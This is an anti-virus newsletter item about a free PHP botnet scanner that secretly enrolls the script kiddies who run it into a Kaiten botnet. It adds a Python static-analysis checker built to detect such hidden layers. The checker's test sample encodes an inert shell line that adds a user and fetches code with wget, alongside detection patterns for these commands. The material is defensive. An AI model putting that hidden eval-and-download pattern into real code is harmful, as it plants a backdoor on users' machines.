“Botology” basics


Dog eats dog


Thursday, December 14, 2017

Some believe the hacker community is friendly and always ready to help out its members, in word and in deed. But is that really so?

Bleeping Computer told its readers about an IP scanner that a hacker wannabe or a script kiddie could use to set up their own Reaper botnet.

An unknown criminal created a website to advertise the free PHP script they wrote. The script can detect devices running the GoAhead embedded web server (as a rule, this means IP cameras and other IoT devices).

Creating a botnet (a centrally controlled zombie network of infected devices) has always been a favourite pastime of hackers. Botnets offer their owners excellent capabilities, ranging from spamming and mining activities to mounting powerful DDoS attacks. There exist several ways to create a botnet. For example, it’s possible to scan computers and devices over the Internet (including your Android tablet, if you're using it to read this issue), determine whether they have vulnerabilities, and then exploit them to deploy malicious code. This is exactly what the specialised scanner applications do.

Script kiddies are inexperienced (or low-skilled) criminals who can't write an exploit or a complex hack tool on their own, i.e., they are underachievers who are after easy money.

Script kiddies eager to possess a botnet of their own are unlikely to notice that a large portion of this "simple" PHP script is heavily obfuscated.

Obfuscation is a set of techniques used to deliberately produce software code that will be harder to understand.

The advertised PHP script consists of four parts:

  1. A working IP scanner, just as the ads promise;
  2. The piece of code responsible for launching bash instructions and adding a new user account onto the server on which the victim will launch the IP scanner;
  3. The piece of code connecting the victim's node to a remote server;
  4. The portion of code that downloads and launches the Kaiten malware on the victim's node. This malware is used to create the eponymous botnet.

Thus, a script kiddie who is eager to establish a Reaper-like botnet will make their machine part of the Kaiten network. The malicious scanner's author uses deception to take advantage of hundreds of script kiddies.
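A static triage pass that inspects a downloaded PHP file without running it and reports hidden layers like the ones listed above. This is an added example, not code from the article or from the script it describes; the indicator patterns, layer names and sample strings are assumptions constructed for illustration.

```python
import base64
import re

# Indicator patterns are assumptions chosen for this example; the article does
# not say which obfuscation or shell constructs the advertised script used.
CHECKS = {
    "decode-and-execute": re.compile(
        r"\b(eval|assert|create_function)\s*\(\s*"
        r"(base64_decode|gzinflate|gzuncompress|str_rot13)\b", re.I),
    "shell-call": re.compile(
        r"\b(shell_exec|exec|system|passthru|popen|proc_open)\s*\(", re.I),
    "account-command": re.compile(r"\b(useradd|adduser|usermod|chpasswd)\b"),
    "download-command": re.compile(r"\b(wget|curl|tftp)\b"),
}
LONG_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/=]{40,})[\"']")


def decode_layer(blob):
    """Return the base64-decoded text of a literal, or '' if it is not base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:
        return ""


def triage(php_source):
    """Return sorted (layer, finding) pairs without ever executing the script."""
    findings = set()
    layers = [("source", php_source)]
    for blob in LONG_LITERAL.findall(php_source):
        findings.add(("source", "long-encoded-literal"))
        layers.append(("decoded", decode_layer(blob)))
    for layer, text in layers:
        for name, pattern in CHECKS.items():
            if pattern.search(text):
                findings.add((layer, name))
    return sorted(findings)


# Constructed samples: inert placeholders, not the script from the article.
_HIDDEN = b'shell_exec("useradd PLACEHOLDER; wget http://example.invalid/PLACEHOLDER");'
TROJANISED = ('<?php\n$ip = $argv[1]; // visible scanner part\n'
              'eval(base64_decode("%s"));\n' % base64.b64encode(_HIDDEN).decode())
PLAIN = '<?php\n$fp = @fsockopen($argv[1], 80, $e, $s, 2);\necho $fp ? "open" : "closed";\n'

if __name__ == "__main__":
    for label, src in (("trojanised", TROJANISED), ("plain", PLAIN)):
        print(label, triage(src))
```

The checker peels only one base64 layer, so a clean result on a script that still contains long opaque literals is not evidence that the script is safe.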

And now, attention!!!


The Anti-virus Times recommends

  1. Do you think attackers should be prosecuted for attempting to take advantage of other criminals?
  2. Should an anti-virus detect malicious files deployed on a script kiddie’s computer? Obviously the scanner script should be blocked; there’s no doubt about that.

